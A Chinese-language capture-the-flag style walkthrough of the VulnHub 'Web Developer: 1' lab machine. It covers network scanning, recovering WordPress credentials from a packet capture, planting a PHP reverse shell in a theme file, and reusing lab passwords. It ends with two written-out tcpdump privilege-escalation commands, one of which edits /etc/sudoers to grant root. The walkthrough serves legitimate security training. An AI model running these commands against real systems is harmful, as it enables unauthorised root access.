本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/web-developer-1,288/
nmap -n -p- -A -sC -sV -sS -o webdeveloper.nmap 192.168.226.131 -o webdevelop.nmap
nmap扫描结果
就开放了两个端口22和80,常规套路访问下80端口
看到WordPress字样,猜测是WordPress博客程序,使用dirb爆破下目录
根据爆破目录的结果,看到如下信息
下载此文件然后使用wireshark打开,过滤下http的数据包信息,然后看请求的URL和POST请求,一个个向下拉,到180这个位置找到了POST请求,发现了登录的账号和密码
webdeveloper
Te5eQg&4sBS!Yr$)wf%(DcAd
登录到WordPress后台之后找到404.php文件上传了php反弹shell,访问:http://192.168.226.131/wp-content/themes/twentysixteen/404.php 最终成功反弹shell
想变成tty-shell,但是发现没有Python,搞不了,那么找找配置文件试试运气
发现了数据库的用户名和密码,那么试试是否能够登录ssh
webdeveloper
MasterOfTheUniverse
成功登录,因为知道密码,就看看sudo -l,发现如下信息
可以通过tcpdump提权了,这个前面演示的靶机也有提到过
echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.bmfx chmod +x /tmp/.bmfx sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root
成功提权rootshell
=====================================================================================================================================================================
另一种提权思路
echo 'echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/.bmfx chmod +x /tmp/.bmfx sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root
